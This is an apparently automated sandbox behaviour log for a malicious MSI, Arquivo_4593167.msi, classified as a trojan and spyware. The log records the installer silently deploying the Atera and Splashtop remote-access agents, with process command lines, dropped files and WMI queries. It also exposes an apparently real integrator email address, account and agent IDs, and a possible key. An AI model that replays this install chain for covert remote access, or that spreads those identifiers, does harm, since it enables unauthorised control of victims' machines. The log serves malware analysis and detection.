                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1695000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/bc2f6fef-7e04-492a-b3cb
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: https://www.digicert.com/CPS0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                                Source: NLog.dll.24.drString found in binary or memory: https://www.nuget.org/packages/NLog.Web.AspNetCore
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2280646482.0000020AB9882000.00000002.00000001.01000000.0000001E.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955108650.000001BE62AF2000.00000002.00000001.01000000.00000019.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                                Source: PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, libssl-3.dll.1.drString found in binary or memory: https://www.openssl.org/H
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Code function: 36_2_0040EBA4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,36_2_0040EBA4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                Spam, unwanted Advertisements and Ransom Demands

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\AlphaAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Code function: 36_2_00428880: CreateFileW,DeviceIoControl,CloseHandle,36_2_00428880
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\stgamepad.sys
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c512.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3352.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C2D.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c515.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c515.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6457.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c516.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI65BF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{E91F8AC1-4917-455E-AACA-B40B193C7A62}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI663D.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c519.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c519.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6738.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c51a.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6833.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6892.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c51d.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\44c51d.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6B72.tmpJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\CustomAction.config
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\CustomAction.config
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_90864756631514CEFBD0C1134238624E
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_90864756631514CEFBD0C1134238624E
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\system32\SRCEF21.tmp
                                Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIC672.tmp
                                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll 443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: String function: 00BC10D0 appears 82 times
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: String function: 00BB91B6 appears 66 times
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: String function: 00BB3DCE appears 62 times
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: String function: 00416118 appears 53 times
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: String function: 00415D1C appears 66 times
                                Source: System.Net.NameResolution.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.IO.Compression.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Collections.Specialized.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Runtime.InteropServices.RuntimeInformation.dll.1.drStatic PE information: No import functions for PE file found
                                Source: Microsoft.Win32.Registry.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.ComponentModel.EventBasedAsync.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Linq.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Runtime.CompilerServices.VisualC.dll.1.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Data.Common.dll.1.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-convert-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Reflection.DispatchProxy.dll.1.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-1.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Collections.dll.1.drStatic PE information: No import functions for PE file found
                                Source: Arquivo_4593167.msiBinary or memory string: OriginalFilenameAlphaControlAgentInstallation.dll\ vs Arquivo_4593167.msi
                                Source: Arquivo_4593167.msiBinary or memory string: OriginalFilenameSfxCA.dll\ vs Arquivo_4593167.msi
                                Source: Arquivo_4593167.msiBinary or memory string: OriginalFilenamewixca.dll\ vs Arquivo_4593167.msi
                                Source: LiteDB.dll.24.drBinary or memory string: .sln
                                Source: LiteDB.dll.24.drBinary or memory string: .csproj.css
                                Source: LiteDB.dll.24.drBinary or memory string: .vbproj.vbs
                                Source: classification engineClassification label: mal100.troj.spyw.evad.winMSI@188/1121@0/8
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0042BB20 GetDiskFreeSpaceExW,_memset,SHGetFolderPathW,SHGetFolderPathW,GetDiskFreeSpaceExW,MessageBoxW,_DebugHeapAllocator,_memset,__aulldiv,__aullrem,36_2_0042BB20
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00429120 CreateToolhelp32Snapshot,Process32FirstW,_DebugHeapAllocator,ProcessIdToSessionId,Process32NextW,CloseHandle,36_2_00429120
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279D3140 CoCreateInstance,40_2_00007FF6279D3140
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_004021F0 LoadResource,LockResource,SizeofResource,36_2_004021F0
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMutant created: NULL
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7064:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5804:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3168:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7956:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6272:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3152:120:WilError_03
                                Source: C:\Windows\Temp\SplashtopStreamer.exeMutant created: \BaseNamedObjects\Global\{47B9233E-7E50-46F2-B442-6A53F0D0F508}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1308:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8036:120:WilError_03
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFF7EC8F46D19662E2.TMP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AteraAgent.exe")
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Windows\System32\sppsvc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AteraAgent.exe")
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile read: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                                Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC672.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4507343 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: Arquivo_4593167.msiStatic file information: TRID: Microsoft Windows Installer (60509/1) 57.88%
                                Source: Arquivo_4593167.msiReversingLabs: Detection: 23%
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Arquivo_4593167.msi"
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0B94C8984E2657846CB3FC17409B05D4
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC672.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4507343 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC961.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4508140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIDCAB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4512968 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="000111.financeiro@yamahaconcessionaria.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000LlkxmIAB" /AgentId="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2"
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIF4AD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4519093 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
